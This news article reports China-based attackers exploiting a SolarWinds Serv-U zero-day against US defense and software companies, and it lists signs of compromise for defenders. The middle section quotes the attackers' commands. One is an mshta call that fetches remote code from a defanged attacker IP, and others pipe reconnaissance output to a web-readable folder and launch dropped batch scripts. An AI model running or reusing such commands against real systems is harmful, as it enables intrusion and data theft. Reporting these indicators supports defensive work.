Hackers used SolarWinds zero-day bug to target US Defense orgs

China-based hackers actively target US defense and software companies using a vulnerability in the SolarWinds Serv-U FTP server.

Today, SolarWinds released a security update for a zero-day vulnerability in Serv-U FTP servers that allow remote code execution when SSH is enabled.

According to SolarWinds, this vulnerability was disclosed to Microsoft, who saw a threat actor actively exploiting the vulnerability to execute commands on vulnerable customer's devices.

Tonight, Microsoft disclosed that the attacks are attributed with high confidence to a China-based threat group tracked as 'DEV-0322.'

"This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure," says a new blog post by the Microsoft Threat Intelligence Center.

This threat group targets publicly exposed Serv-U FTP servers belonging to entities in the US Defense Industrial Base Sector and software companies.

"The DIB Sector is the worldwide industrial complex that enables research and development (R&D), as well as design, production, delivery, and maintenance of military weapons systems, subsystems, and components or parts, to meet U.S. military requirements," explains a CISA document describing the DIB sector.

Attacks detected by Microsoft 365 Defender telemetry

Microsoft says they first learned of the attacks after Microsoft 365 Defender telemetry showed a normally harmless Serv-U process spawning anomalous malicious processes.

Some of the commands executed through the remote code execution vulnerability are listed below.

C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged) cmd.exe /c whoami > “./Client/Common/redacted.txt” cmd.exe /c dir > “.\Client\Common\redacted.txt” cmd.exe /c “”C:\Windows\Temp\Serv-U.bat”” powershell.exe C:\Windows\Temp\Serv-U.bat cmd.exe /c type \\redacted\redacted.Archive > “C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive”

"We observed DEV-0322 piping the output of their cmd.exe commands to files in the Serv-U \Client\Common\ folder, which is accessible from the internet by default, so that the attackers could retrieve the results of the commands," Microsoft explains in their blog post.

Other commands would add a global admin user to the Serv-U FTP server configuration or launch batch files and scripts to likely install malware on the devices for persistence and remote access.

Microsoft says Serv-U users can check if their devices were compromised by checking the Serv-U DebugSocketLog.txt log file and looking for exception messages.

A "C0000005; CSUSSHSocket::ProcessReceive" exception could indicate that the threat actors attempted to exploit the Serv-U server, but the exception could be shown for other reasons as well.

An example exception seen in logs is displayed below.

EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive(); Type: 30; puchPayLoad = 0x03e909f6; nPacketLength = 76; nBytesReceived = 80; nBytesUncompressed = 156; uchPaddingLength = 5

Other signs that a device may have been compromised are:

Recently created .txt files under the Client\Common\ folder. Serv-U spawned processes for mshta.exe, powershell.exe, cmd.exe, and processes running from C:\Windows\temp. Unrecognized global users in the Serv-U configuration.

BleepingComputer has reached out to Microsoft to learn more about what commands or malware were executed by the batch file and scripts but has not heard back.